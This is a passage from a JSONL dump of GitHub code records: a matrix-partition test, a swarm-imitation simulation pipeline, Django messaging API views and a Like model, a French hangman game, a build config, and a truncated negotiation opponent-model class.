else:\n for v in partition_two(cutlen,m,n):\n l.append(v)\n return sorted(l,key=functools.cmp_to_key(antidiagonal_cmp))\n\ndef pairs_count(covered,p):\n s0 = p[0][0]\n l0 = p[0][1]\n end0 = s0 + l0\n if p[1] is None:\n if covered is not None:\n for i in range(s0,end0-1):\n for j in range(i+1,end0):\n assert covered[i][j] == 0\n covered[i][j] = 1\n return (l0 * (l0-1))//2\n else:\n s1 = p[1][0]\n l1 = p[1][1]\n end1 = s1 + l1\n if covered is not None:\n for i in range(s0,end0):\n for j in range(s1,end1):\n assert covered[i][j] == 0\n covered[i][j] = 1\n return l0 * l1\n\ndef parse_arguments(argv):\n p = argparse.ArgumentParser(description='divide matrix into submatrices')\n p.add_argument('-d','--debug',action='store_true',default=False,\n help=('keep track of covered intervals (very slow) for '\n 'debugging'))\n p.add_argument('cutlen',type=int,default=None,help='specify cutlen')\n p.add_argument('rows',type=int,default=None,help='specify number of rows')\n p.add_argument('cols',type=int,default=None,help='specify number of columns')\n return p.parse_args(argv)\n\nargs = parse_arguments(sys.argv[1:])\n\ncollect = set()\nnum_pairs = 0\ncovered = None\nif args.debug:\n import numpy as np\n if args.cols == 0:\n covered = np.zeros((args.rows,args.rows),dtype=np.uint8)\n else:\n covered = np.zeros((args.rows,args.cols),dtype=np.uint8)\n\nif args.cols == 0:\n expected = (args.rows * (args.rows-1))//2\nelse:\n expected = args.rows * args.cols\n\nfor itv in partition(args.cutlen,args.rows,args.cols):\n assert not itv in collect\n collect.add(itv)\n pc = pairs_count(covered,itv)\n num_pairs += pc\n print('{}\\t{}\\t{}'.format(itv,antidiagonal(itv),pc))\n\nprint('# number of parts\\t{}'.format(len(collect)))\nprint('# number of pairs\\t{}'.format(num_pairs))\nassert not args.debug or num_pairs == np.sum(covered)\nassert num_pairs == expected, ('num_pairs = {} != {} = expected'\n .format(num_pairs,expected))\n","repo_name":"stefan-kurtz/gttl","sub_path":"testsuite/matrix_partition.py","file_name":"matrix_partition.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"4848070904","text":"# even this will become another function eventually\nfrom pipeline_tools.learning import learnMotionConstraints, learnNeighborRadius, learnGainsLinearRegression, learnGainsNonLinearOptimization\nfrom pipeline_tools.prevalidation import plotNeighborRadius, testTrueNeighborRadius, testTrueGainsLinear, testTrueGainsNonLinear\nfrom sim_tools import sim\nfrom sim_tools import media_export as export\nfrom imitation_tools import data_prep\nfrom features.features import *\nfrom models.featureCombo import FeatureCombo as fc\nfrom models.featureComboEnv import FeatureComboEnv as fcE\n\nfrom tqdm import tqdm\nimport numpy as np\nimport copy\nimport os\n\nparams = sim.SimParams(\n num_agents=40,\n dt=0.05,\n overall_time=30,\n enclosure_size=20,\n init_pos_max=None, # if None, then defaults to enclosure_size\n agent_max_vel=7,\n init_vel_max=None,\n agent_max_accel=np.inf,\n agent_max_turn_rate=np.inf,\n neighbor_radius=5,\n periodic_boundary=False\n)\n\nif __name__ == '__main__':\n\n # INITIAL GENERATION\n orig_soc_features = [\n Cohesion(),\n Alignment(),\n SeparationInv2(),\n SteerToAvoid(params.neighbor_radius/4,params.neighbor_radius),\n Rotation(),\n ]\n\n orig_env_features = [\n Inertia(),\n ]\n\n\n true_gains = np.array([3, 0, 1,1,1,0])\n orig_controller = fcE(true_gains[:len(orig_soc_features)],orig_soc_features,true_gains[len(orig_soc_features):], orig_env_features)\n orig_controllers = [copy.deepcopy(orig_controller)\n for i in range(params.num_agents)]\n\n print(\"Run and export initial sim\")\n initSimPos, initSimVels = sim.runSim(\n orig_controllers, params, progress_bar=True)\n\n if not os.path.exists(\"Output/Full_Pipeline_Output_Artificial\"):\n os.makedirs(\"Output/Full_Pipeline_Output_Artificial\")\n\n print(\"Run Training Sims\")\n # eventually would like to eliminate/reduce this step, and learn from primarily one big sim\n trainingParams = copy.deepcopy(params)\n trainingParams.num_agents = 10\n trainingParams.enclosure_size = 10\n trainingParams.init_vel_max = 1\n trainingParams.overall_time = 4\n num_sims = 100\n \n posVelSlices = []\n # posVelSlices = data_prep.toPosVelSlices(initSimPos,params)\n for i in tqdm(range(num_sims)):\n trainPositions, trainVels = sim.runSim(\n orig_controllers, trainingParams, progress_bar=False)\n\n # apply noise to position data\n # noise_percent = 0.001\n # for pos in trainPositions:\n # # 0.6 to account for stdev value, so most things are within bounds\n # # maybe should do the noise based on current vel\n # noise = 0.6*noise_percent*params.agent_max_vel*np.random.normal(0,1,size=(2))*params.dt\n # pos+=noise\n\n posVelSlices.extend(data_prep.toPosVelSlices(\n trainPositions, trainingParams))\n\n social_features = {\n \"coh\": Cohesion(),\n \"align\": Alignment(),\n \"sep\": SeparationInv2(),\n \"steer\":SteerToAvoid(params.neighbor_radius/4,params.neighbor_radius),\n \"rot\":Rotation()\n }\n\n env_features = {\n \"inertia\": Inertia(),\n }\n\n # VALIDATION\n# \n # realFeatureSlices = data_prep.toFeatureSlices(\n # posVelSlices, social_features,env_features, trainingParams)\n # print(\"Neighbor radius true loss\", testTrueNeighborRadius(\n # posVelSlices, trainingParams, social_features,env_features))\n # print(\"Gain true loss for linear\", testTrueGainsLinear(\n # true_gains, realFeatureSlices, trainingParams))\n # print(\"Gain true loss for nonlinear\", testTrueGainsNonLinear(\n # true_gains, realFeatureSlices, trainingParams))\n\n # plotNeighborRadius(posVelSlices, trainingParams, social_features,env_features)\n\n # LEARNING\n # being very explicit here, only transferring from original exactly what we will transfer\n # eventually should split params class itself, but that's for later\n learnedParams = sim.SimParams()\n learnedParams.dt = trainingParams.dt\n learnedParams.num_agents = trainingParams.num_agents\n learnedParams.enclosure_size = trainingParams.enclosure_size\n\n learnedMCs = learnMotionConstraints(posVelSlices, learnedParams)\n\n print(\"Learned MCs\", learnedMCs)\n learnedParams.agent_max_vel = learnedMCs[\"max_vel\"]\n # other two aren't learned properly yet\n\n radius = learnNeighborRadius(\n posVelSlices, learnedParams, social_features,env_features)\n print(\"Learned Radius\", radius)\n learnedParams.neighbor_radius = radius\n\n featureSlices = data_prep.toFeatureSlices(\n posVelSlices, social_features,env_features, learnedParams)\n\n linear_gains = learnGainsLinearRegression(\n featureSlices, learnedParams, social_features,env_features)\n print(\"Linear gains\", linear_gains)\n\n improved_gains = learnGainsNonLinearOptimization(\n featureSlices, learnedParams, guess=linear_gains, maxSample=5000)\n print(\"Improved Gains\", improved_gains)\n\n # RUN OUTPUT SIMS\n # make numbers line up\n learnedParams.num_agents = params.num_agents\n learnedParams.overall_time = params.overall_time\n learnedParams.enclosure_size = params.enclosure_size\n\n soc_gains = improved_gains[:len(social_features)]\n env_gains = improved_gains[len(social_features):]\n imitation_controller = fcE(soc_gains, list(\n social_features.values()), env_gains, list(env_features.values()))\n imitated_controllers = [copy.deepcopy(\n imitation_controller) for i in range(learnedParams.num_agents)]\n for controller in imitated_controllers:\n controller.setColor(\"red\")\n\n print(\"Running Imitation Sim\")\n imitSimPos, imitSimVels = sim.runSim(imitated_controllers, learnedParams,\n initial_positions=initSimPos[0], initial_velocities=initSimVels[0], progress_bar=True)\n # hybrid --no good way to show different radiuses right now, so not showing yet\n # mix_factor = 0.5\n # num_orig = (0.5*params.num_agents)\n # hybrid_controllers = orig_controllers[0:]\n\n # EXPORT TO FILES\n print(\"Exporting to files\")\n export.export(export.ExportType.GIF, \"Output/Full_Pipeline_Output/Initial\",\n initSimPos, initSimVels, params, progress_bar=True)\n export.export(export.ExportType.GIF, \"Output/Full_Pipeline_Output/Imitated\", imitSimPos,\n imitSimVels, learnedParams, progress_bar=True, controllers=imitated_controllers)\n","repo_name":"wvu-robotics/REU_MatlabSim","sub_path":"matlab/REU_2022/Topic_1_ Imitating_Swarms/SwarmSimClassSeparationPy/full_pipeline_artificial.py","file_name":"full_pipeline_artificial.py","file_ext":"py","file_size_in_byte":6457,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"37739413758","text":"\"\"\"\nThe Views File which contains the views that will execute from the urls endpoints by the RestAPI structure. (see in `mainapp/urls.py`)\n-------------\n\nThe decorators in each view function e.g. @api_view([\"GET\"]),\nis for the view function to accept only specific HTTP Requests, or to provide an Authentication barrier.\n\n\"\"\"\n\n# Custom Imports\nfrom mainapp.models import Message, MessageUser # Custom Models\nfrom mainapp.serializers import MessageSerializer # Custom Serializers\n\n#Django Imports\nfrom django.core.exceptions import ObjectDoesNotExist # Exception if the object is not exist\nfrom django.db import IntegrityError # Exception if the username is already taken\n\n# Django Rest Framework Imports\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view,permission_classes # For DjangorestFramework Decorators\nfrom rest_framework import status # For HTTP statuses\nfrom rest_framework.permissions import IsAuthenticated,AllowAny # For User Authentication\n\n\n@api_view([\"GET\"])\n@permission_classes([IsAuthenticated])\ndef get_all_messages(request, *args, **kwargs):\n '''\n Returns all Messages of the logged-in User.\n\n Parameters:\n request (HTTP Request) : contains various HTTP content \n *args (possible non-keyword arguments)\n *kwargs (possible keyword arguments) : contains the username in the endpoint (for example: /user1/messages) user1 is the username)\n\n Returns:\n Json Response (Json): if valid - returns the messages, if not - returns Http-Error Response\n '''\n\n username = kwargs[\"username\"]\n\n # Check if the user is trying to read other user messages:\n if request.user.username != username:\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n \n #try to fetch the User Object:\n try:\n user_object = MessageUser.objects.get(username=username)\n except MessageUser.DoesNotExist:\n return Response(status=status.HTTP_404_NOT_FOUND) \n except Exception as e:\n return Response(e)\n \n # Getting the messages of the user - and serialized them into JSON data that can be sent as a response\n all_messages = MessageSerializer(user_object.messages.all(),many=True)\n\n return Response(all_messages.data)\n\n\n@api_view([\"GET\",\"DELETE\"])\n@permission_classes([IsAuthenticated])\ndef message(request, *args, **kwargs):\n '''\n Returns specific Message of the logged-in User.\n\n Parameters:\n request (HTTP Request) : contains various HTTP content \n *args (possible non-keyword arguments)\n *kwargs (possible keyword arguments) : contains the username and the ID of the message in the endpoint (for example: /user1/messages/3) user1 is the username and 3 is the message ID)\n\n Returns:\n Json Response (Json): if valid - returns the message, if not - returns Http-Error Response\n '''\n\n id = kwargs['id']\n username = kwargs[\"username\"]\n\n if request.user.username != username:\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n\n if request.method=='GET': \n \n try:\n user_object = MessageUser.objects.get(username=username)\n message = user_object.messages.all()[int(id)-1] # minus 1, Because the QuerySet using from-0 counting \n message_serializer = MessageSerializer(message)\n\n message.is_read = True\n message.save() # update the 'is_read' attribute\n\n return Response(message_serializer.data)\n\n except ObjectDoesNotExist:\n return Response(status=404)\n\n except IndexError as i:\n return Response(data={\"The message not exist - message ID Out of Range\":str(i)})\n except Exception as e:\n return Response(e)\n\n elif request.method=='DELETE': \n \n try:\n user_object = MessageUser.objects.get(username=username)\n message = user_object.messages.all()[int(id)-1]\n user_object.messages.remove(message)\n \n return Response(status=200)\n\n except ObjectDoesNotExist:\n return Response(status=404)\n\n except Exception as e:\n return Response(e)\n\n\n@api_view([\"POST\"])\n@permission_classes([IsAuthenticated])\ndef write_message(request, *args, **kwargs):\n '''\n Send a New Message for the logged-in User.\n\n The API works with JSON data. Example:\n\n {\n \"sender\": \"your-user-name\",\n \"receiver\": \"user-name\" ,\n \"message_txt\": \"Message-Text\",\n \"subject\": \"Message-Subject\"\n }\n\n Parameters:\n request (HTTP Request) : contains various HTTP content, and in particular - 'data' which contains the New Message data to be sent.\n *args (possible non-keyword arguments)\n *kwargs (possible keyword arguments) : contains the username in the endpoint (for example: /user1/messages) user1 is the username)\n\n Returns:\n Json Response (Json): if valid - returns the New Message that has been sent with a HTTP_201_CREATED status, if not - returns Http-Error Response\n '''\n\n receiver_name = request.data['receiver']\n sender_name = request.data['sender']\n message_dict = request.data \n\n if request.user.username != sender_name: \n return Response(status=status.HTTP_401_UNAUTHORIZED)\n\n # Replace the usernames strings to IDs (user's primary key for a valid de-Serialization )\n request.data['receiver'] = MessageUser.objects.get(username=receiver_name).id\n request.data['sender'] = MessageUser.objects.get(username=sender_name).id\n\n #de-serialize the message that the user sent(in JSNO format) to Python friendly data - in order to save it as a Message Model.\n message_serializer = MessageSerializer(data = request.data)\n \n if message_serializer.is_valid():\n # gets the Users Objects\n receiver_user_object = MessageUser.objects.get(username=receiver_name)\n sender_user_object = MessageUser.objects.get(username=sender_name)\n\n #replacing the ID's in the message that the user sent - with actual User Object - for Django to bind it with the coressponding ForiegnKey - MessageUser:\n message_dict[\"receiver\"] = receiver_user_object\n message_dict[\"sender\"] = sender_user_object\n\n # converts the message dictionary (that it makes by de-serialize the JSON data the user sent) to a Message Object(for saving it in the DB)\n message = Message(**message_dict) \n message.save()\n \n # Saves the message in the DB for the receiver:\n receiver_user_object.messages.add(message)\n\n # Saves duplicate of the message in the DB for the sender:\n dup_message = Message(**message_dict) # the ** mark tells the Model to parse the dict as args\n dup_message.is_read = True # The sender obviously saw the message..\n dup_message.save()\n sender_user_object.messages.add(dup_message)\n \n return Response(message_serializer.data, status=status.HTTP_201_CREATED)\n else: \n return Response(message_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view([\"GET\"])\n@permission_classes([IsAuthenticated])\ndef get_unread_messages(request, *args, **kwargs):\n '''\n Returns all Unread Messages of the logged-in User.\n\n Parameters:\n request (HTTP Request) : contains various HTTP content \n *args (possible non-keyword arguments)\n *kwargs (possible keyword arguments) : contains the username in the endpoint (for example: /user1/messages) user1 is the username)\n\n Returns:\n Json Response (Json): if valid - returns the unread messages, if not - returns Http-Error Response\n '''\n\n username = kwargs[\"username\"]\n\n if request.user.username != username:\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n try:\n user_object = MessageUser.objects.get(username=username)\n unread_messages = MessageSerializer(user_object.messages.filter(is_read=False), many=True) # Filter the messages by the `is_read` boolean field to get only the unread messages\n \n return Response(unread_messages.data)\n\n except Exception as e:\n return Response(e)\n\n\n@api_view([\"POST\"])\n@permission_classes([AllowAny])\ndef create_user(request, *args, **kwargs):\n \"\"\"\n Create a User to perform API requests with it!\n\n The JSON format:\n\n {\n \"username\": \"your username here\",\n \"password\": \"yourpasswordhere\"\n }\n\n \"\"\" \n\n user_dict = request.data\n\n try:\n\n MessageUser.objects.create_user(**user_dict)\n return Response(status=status.HTTP_201_CREATED)\n\n except IntegrityError:\n return Response(data={\"User Name is Already Taken\"},status=status.HTTP_409_CONFLICT)\n\n except Exception as e:\n return Response(e)\n ","repo_name":"dviralfi/RestAPI-Messages","sub_path":"mainapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21361467029","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Nov 3 10:49:03 2019\r\n\r\n@author: natas\r\n\"\"\"\r\n\r\nmotmystere= \"\"\r\nmorpartiel= \"\"\r\nlettre= \"\"\r\nnbcoup = 7\r\nlistemots = list()\r\ngo = True\r\n\r\nfichier = open(\"listemots.txt\", \"r\")\r\nlistemots = fichier.readlines()\r\nfichier.close()\r\n\r\nfrom random import choice\r\n\r\ndef choixmot(listemots):\r\n return choice(listemots).rstrip()\r\n\r\ndef initpartiel(motmystere):\r\n motdebut = \"_\"* len(motmystere)\r\n return motdebut\r\n\r\ndef affichemot(motpartiel):\r\n motaffiche = str()\r\n for i in range(len(motpartiel)):\r\n motaffiche = motaffiche + \" \" + motpartiel[i]\r\n print(motaffiche)\r\n \r\ndef initpendu():\r\n global listemots, motmystere, motpartiel, nbcoup\r\n nbcoup = 7\r\n motmystere = choixmot(listemots)\r\n motpartiel = initpartiel(motmystere)\r\n \r\ndef saisiecaract():\r\n lettre = input(\"taper une lettre de votre choix : \")\r\n if lettre == \"?\":\r\n return lettre\r\n while len(lettre) != 1 or (not(65 <= ord(lettre) <= 89 or 97 <= ord(lettre) <= 122)):\r\n lettre = input(\"taper une lettre de votre choix:\")\r\n lettre = lettre.upper()\r\n return lettre\r\n\r\ndef placelettre(lettre,motpartiel):\r\n for i in range(len(motmystere)):\r\n if lettre == motmystere[i]:\r\n motpartiel = motpartiel[:i] + lettre + motpartiel[i+1:]\r\n return motpartiel\r\n \r\ndef finjeu(motmystere,motpartiel,nbcoup,lettre):\r\n if motpartiel == motmystere :\r\n print (\"brv, t'as trouver un mot dans ta vie et c'est:\", motmystere)\r\n return False\r\n if lettre == \"?\":\r\n print(\"fin lol tu veux plus zouer, le mot était:\", motmystere)\r\n return False\r\n if nbcoup == 0:\r\n print(\"perdu rip, le mot était\", motmystere)\r\n return False\r\n return True\r\n \r\ninitpendu()\r\nwhile go :\r\n affichemot(motpartiel)\r\n lettre = saisiecaract()\r\n nbcoup -= 1\r\n print(\"essais restants :\", nbcoup)\r\n motpartiel = placelettre(lettre,motpartiel)\r\n go = finjeu(motmystere, motpartiel, nbcoup, lettre)\r\n\r\n\r\n ","repo_name":"kwintasha/jeu-du-pendu","sub_path":"le jeu du pendu/le jeu du pendu.py","file_name":"le jeu du pendu.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"25752859841","text":"import os\n\n\ncastxml_bin = \"castxml\"\ncastxml_args = \"--castxml-output=1 -w -x c++ -std=c++14 -D__PBPP__\"\npremake_bin = \"premake5\"\n\nif os.name == \"nt\":\n castxml_args += \" -fms-compatibility-version=19\"\n pyroot = r\"C:\\Python27\"\n make = \"mingw32-make\"\nelse: # posix\n pyroot = \"\"\n make = \"make\"\n","repo_name":"vanxining/pbpp","sub_path":"Tests/full_process/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"39531588594","text":"from django.db import models\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.contrib.contenttypes.fields import GenericForeignKey\nfrom django.contrib.auth import get_user_model\nfrom django.utils.translation import gettext_lazy as _\n\n\nclass Like(models.Model):\n content_type = models.ForeignKey(to=ContentType,\n on_delete=models.CASCADE)\n object_id = models.PositiveIntegerField()\n content_object = GenericForeignKey()\n user = models.ForeignKey(to=get_user_model(),\n null=False,blank=False,\n on_delete=models.CASCADE,\n related_name='likes',\n verbose_name=_(\"user\"))\n created = models.DateTimeField(auto_now_add=True,\n null=False,blank=False,\n verbose_name=_(\"created date\"))\n\n class Meta:\n verbose_name = _(\"Like\")\n verbose_name_plural = _(\"Likes\")\n unique_together = ('content_type','object_id','user')\n","repo_name":"MehdioKhan/proman-back","sub_path":"project/likes/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"1100949153","text":"\n\nimport numpy as np\nimport itertools\nfrom functools import wraps\nimport negmas\n\nNUMPY_TYPE = 'float64'\n\ndef likelihood_none_zero(likelihood_cal):\n @wraps(likelihood_cal)\n def wraplikelihood(*args, **kw):\n likelihood = likelihood_cal(*args, **kw)\n if likelihood.max() == 0:\n likelihood[:] = 1\n print('we are in the wrap')\n likelihood = (likelihood.shape[0] * likelihood) / likelihood.sum()\n return likelihood.astype(NUMPY_TYPE)\n return wraplikelihood\n\nclass weight_space:\n\n def __init__(self, ufun, num_hypothesis = 11) -> None:\n\n self.num_issues = len(ufun.weights)\n\n self.num_hypothesis = num_hypothesis\n self.h_space = None\n self.h_probs = None\n self.expectation = None\n self.temp_h_probs = None\n\n self.issue_values_range = {}\n self.issue_num_values = {}\n _i = 0\n _ii = 0\n for k in range(len(ufun.issues)):\n self.issue_values_range[k] = [_ii]\n _i = len(ufun.issues[k].values)\n self.issue_num_values[k] = _i\n _ii = _ii + _i\n self.issue_values_range[k].append(_ii)\n self.num_values = _ii\n\n self.initial_expectation_mode()\n\n self.initial_sapce()\n self.accume = self.get_expectation()\n\n def initial_sapce(self):\n Hs, Ps = self.Grid_First_decopuled_WHS()\n self.h_space = Hs\n self.h_probs = Ps.copy()\n self.initial_h_probs = Ps.copy()\n\n def flatten_weights_HS(self, W_Hspace):\n len_E_HS = self.num_values\n weights_flatten = np.ones([W_Hspace.shape[0], len_E_HS], dtype = NUMPY_TYPE)\n for i in range(self.num_issues):\n range_se = self.issue_values_range[i]\n range_s = range_se[0]\n range_e = range_se[1]\n repeat_times = self.issue_num_values[i]\n weights_flatten[:, range_s:range_e] = np.repeat(W_Hspace[:,i].reshape([-1,1]), repeat_times, axis = 1)\n return weights_flatten\n\n def initial_expectation_mode(self):\n self.get_expectation = self._get_expectation_1\n \n def _get_expectation_1(self):\n accume_w = (self.h_space * self.h_probs).sum(axis = 1) / self.h_probs.sum(axis = 1)\n sum_w = accume_w.sum()\n accume_w = accume_w / sum_w\n return accume_w\n \n def update_accume(self):\n self.accume = self.get_expectation()\n\n def expectation_except_issue_i(self, issue_i):\n wh_issue_i = self.h_space[issue_i, :]\n # prob_issue_i = self.h_probs[issue_i, :]\n expectation = np.copy(self.accume)\n expectation = expectation.reshape([1,-1]).repeat(repeats = wh_issue_i.shape[0], axis = 0)\n expectation[:, issue_i] = wh_issue_i\n return expectation\n \n def Grid_First_decopuled_WHS(self):\n weights_HS = np.linspace(0, 1, self.num_hypothesis).reshape([1,-1]).repeat(axis = 0, repeats = self.num_issues)\n WH_probs = np.ones_like(weights_HS)\n return weights_HS, WH_probs\n\nclass evaluation_space:\n\n def __init__(self, ufun, num_hypothesis = 11) -> None:\n self.h_space = None\n self.h_probs = None\n self.expectation = None\n self.num_values = None\n self.issue_num_values = {}\n self.issue_values_range = {}\n self.num_issues = len(ufun.issues)\n\n\n _i = 0\n _ii = 0\n for k in range(len(ufun.issues)):\n self.issue_values_range[k] = [_ii]\n _i = len(ufun.issues[k].values)\n self.issue_num_values[k] = _i\n _ii = _ii + _i\n self.issue_values_range[k].append(_ii)\n self.num_values = _ii\n \n self.num_hypothesis = num_hypothesis\n\n self.initial_expectation_mode()\n\n self.initial_sapce()\n self.accume = self.get_expectation()\n\n def initial_sapce(self):\n\n Hs, Ps = self.Second_decopuled_EHS_mean()\n \n self.h_space = Hs\n self.h_probs = Ps.copy()\n self.initial_h_probs = Ps.copy()\n \n def Second_decopuled_EHS_mean(self):\n num_values = self.num_values\n Hs = np.linspace(0, 1, self.num_hypothesis).reshape([1,-1]).repeat(axis=0, repeats = num_values).astype(NUMPY_TYPE)\n Ps = np.ones_like(Hs)\n return Hs, Ps\n \n def initial_expectation_mode(self):\n\n self.get_expectation = self._get_expectation_2b\n \n def _get_expectation_2b(self):\n accume_e = (self.h_space * self.h_probs).sum(axis = 1) / self.h_probs.sum(axis = 1)\n return accume_e\n\n def update_accume(self):\n self.accume = self.get_expectation()\n\n def expectation_except_issue_i(self, issue_i):\n h_issue_i = self.h_space[issue_i]\n # prob_issue_i = self.h_probs[issue_i]\n expectation = np.copy(self.accume)\n expectation = expectation.reshape([1,-1]).repeat(repeats=h_issue_i.shape[0], axis = 0)\n value_range = self.issue_values_range[issue_i]\n expectation[:, value_range[0]:value_range[1]] = h_issue_i\n return expectation\n\n def expectation_except_issue_i_value_j_rank(self, issue_i, value_j):\n h_issue_i_value_j = self.h_space[issue_i][value_j, :]\n # prob_issue_i_value_j = self.h_probs[issue_i][value_j, :]\n expectation = np.copy(self.accume)\n expectation = expectation.reshape([1,-1]).repeat(repeats=h_issue_i_value_j.shape[0], axis = 0)\n value_range = self.issue_values_range[issue_i]\n value_start = value_range[0]\n value_update = value_start + value_j\n expectation[:, value_update] = h_issue_i_value_j\n return expectation\n \n def expectation_except_issue_i_value_j_mean(self, faltten_value_j):\n h_issue_i_value_j = self.h_space[faltten_value_j, :]\n # prob_issue_i_value_j = self.h_probs[faltten_value_j, :]\n expectation = np.copy(self.accume)\n expectation = expectation.reshape([1,-1]).repeat(repeats=h_issue_i_value_j.shape[0], axis = 0)\n expectation[:, faltten_value_j] = h_issue_i_value_j\n return expectation\n\nclass Meta_OM:\n\n def __init__(self, ufun, \n compact_version = 'None',\n compact_gate = 500,\n time_max = 5000,\n SIGMA = 0.15):\n \n self._init_base(ufun, time_max, SIGMA, compact_version, compact_gate)\n\n self.weights = weight_space(ufun = ufun)\n self.evaluations = evaluation_space(ufun = ufun)\n \n self.update_weights = self.update_weights_v1\n\n self.update_evaluations = self.update_evaluations_v2b\n \n # self.update_accumed_ufun()\n \n def _init_base(self, ufun, time_max, SIGMA, compact_version, compact_gate):\n self.bids_history = []\n self.onehot_bids_history = None\n self.onehot_bids_history_origin = None\n self.time_sequence = np.array([], dtype = NUMPY_TYPE)\n self.time_sequence_origin = np.array([], dtype = NUMPY_TYPE)\n self.SIGMA = SIGMA\n\n self.num_outcomes = negmas.outcomes.num_outcomes(ufun.outcome_space.issues)\n\n self.times_i = 0\n # self.time_correct = 0\n self.first_update = 1\n self.time_max = time_max\n\n self.issues = []\n self.values = {}\n self.issue_num = {}\n self.value_num_issue = {} \n self.issue_value_num_flatten = {}\n self.issueID_valueID_flatten = {}\n self.num_issues = len(ufun.issues)\n _i = 0\n _iii = 0\n self.weights_range = {}\n for k in ufun.issues:\n k_name = k.name\n k_values = k.values\n self.issues.append(k_name)\n self.values[k_name] = k_values\n self.issue_num[k_name] = _i\n self.issue_value_num_flatten[_i] = {}\n self.weights_range[_i] = []\n self.value_num_issue[_i] = {}\n self.issueID_valueID_flatten[_i] = {}\n _ii = 0\n for v in k_values:\n self.value_num_issue[_i][v] = _ii\n self.issueID_valueID_flatten[_i][_ii] = _iii\n _ii = _ii + 1\n self.issue_value_num_flatten[_i][v] = _iii\n self.weights_range[_i].append(_iii)\n _iii = _iii + 1\n _i = _i + 1\n self.num_values = _iii # the lenth of flatten evaluations\n self.update = self._first_update_func\n self.likelihood_func = self._first_likelihood_func\n \n self.compact_gate = compact_gate\n if compact_version == 'Moving':\n self.compact_bids_times = self._compact_bids_times_Moving\n else:\n self.compact_bids_times = self._compact_bids_times_None\n\n def flatten_weights_HS(self, W_Hspace):\n len_E_HS = self.num_values\n weights_flatten = np.ones([W_Hspace.shape[0], len_E_HS], dtype=NUMPY_TYPE)\n for i in range(self.num_issues):\n range_repeat = self.weights_range[i]\n repeat_times = len(range_repeat)\n weights_flatten[:, range_repeat] = np.repeat(W_Hspace[:,i].reshape([-1,1]), repeat_times, axis = 1)\n return weights_flatten\n\n def update_weights_v1(self, accume_e):\n for i in range(self.weights.num_issues):\n hs_i = self.weights.expectation_except_issue_i(i)\n hs_i_flatten = self.flatten_weights_HS(hs_i)\n ufun_flatten = hs_i_flatten * accume_e\n Ls = self.likelihood_func(ufun_flatten)\n h_probs_i = self.weights.h_probs[i, :] * Ls\n\n prob_sum = h_probs_i.sum()\n if prob_sum != 0:\n self.weights.h_probs[i, :] = (h_probs_i * h_probs_i.size) / prob_sum\n else:\n self.weights.h_probs[i, :] = np.ones_like(h_probs_i)\n\n self.weights.update_accume()\n\n def update_evaluations_v2b(self, accume_w_flatten):\n for j in range(self.num_values):\n hs_j = self.evaluations.expectation_except_issue_i_value_j_mean(j)\n ufun_j = hs_j * accume_w_flatten\n Ls = self.likelihood_func(ufun_j)\n h_probs_j = self.evaluations.h_probs[j,:] * Ls\n\n sum_prob = h_probs_j.sum()\n if sum_prob != 0:\n self.evaluations.h_probs[j,:] = (h_probs_j * h_probs_j.size) / sum_prob\n else:\n self.evaluations.h_probs[j,:] = np.ones_like(h_probs_j)\n\n self.evaluations.update_accume()\n\n def _update_base(self, offer):\n offer_onehot = self.offer_2_onehot(offer)\n self.onehot_bids_history_origin = np.append(self.onehot_bids_history_origin, offer_onehot.reshape([1,-1]), axis = 0)\n self.bids_history.append(offer)\n self.update_time_sequence()\n self.compact_bids_times()\n\n def _compact_bids_times_Moving(self):\n if self.onehot_bids_history_origin.shape[0] <= self.compact_gate:\n self.onehot_bids_history = self.onehot_bids_history_origin\n self.time_sequence = self.time_sequence_origin\n else:\n self.onehot_bids_history = self.onehot_bids_history_origin[-self.compact_gate:, :]\n self.time_sequence = self.time_sequence_origin[-self.compact_gate:]\n \n def _compact_bids_times_None(self):\n self.onehot_bids_history = self.onehot_bids_history_origin\n self.time_sequence = self.time_sequence_origin\n\n def _update_base_first(self, offer):\n offer_onehot = self.offer_2_onehot(offer)\n self.onehot_bids_history_origin = offer_onehot.reshape([1,-1])\n self.onehot_bids_history = self.onehot_bids_history_origin\n\n self.not_proposed = np.ones(self.num_values) * self.num_outcomes / 2\n self.not_proposed = self.not_proposed - offer_onehot\n self.num_unproposed = self.num_outcomes - 1\n\n self.bids_history.append(offer)\n self.first_update_time_sequence()\n self.time_sequence = self.time_sequence_origin\n\n def update_Sequence(self, offer, t):\n self._update_base(offer)\n\n accume_e = self.evaluations.accume.reshape([1,-1])\n self.update_weights(accume_e = accume_e)\n self.weights.update_accume()\n\n accume_w_flatten = self.flatten_weights_HS(self.weights.accume.reshape([1,-1]))\n self.update_evaluations(accume_w_flatten = accume_w_flatten)\n self.evaluations.update_accume()\n\n self.update_accumed_ufun()\n\n def _first_update_func(self, offer, t):\n self._update_base_first(offer)\n\n accume_e = self.evaluations.accume.reshape([1,-1])\n self.update_weights(accume_e = accume_e)\n accume_w_flatten = self.flatten_weights_HS(self.weights.accume.reshape([1,-1]))\n self.update_evaluations(accume_w_flatten = accume_w_flatten)\n self.update_accumed_ufun()\n\n self.evaluations.initial_h_probs = self.evaluations.h_probs\n self.weights.initial_h_probs = self.weights.h_probs\n self.first_update = 0\n\n self.update = self.update_Sequence\n self.likelihood_func = self._likelihood_func\n\n def offer_2_onehot(self, offer):\n offer_onehot = np.zeros(self.num_values, dtype='int')\n for i in 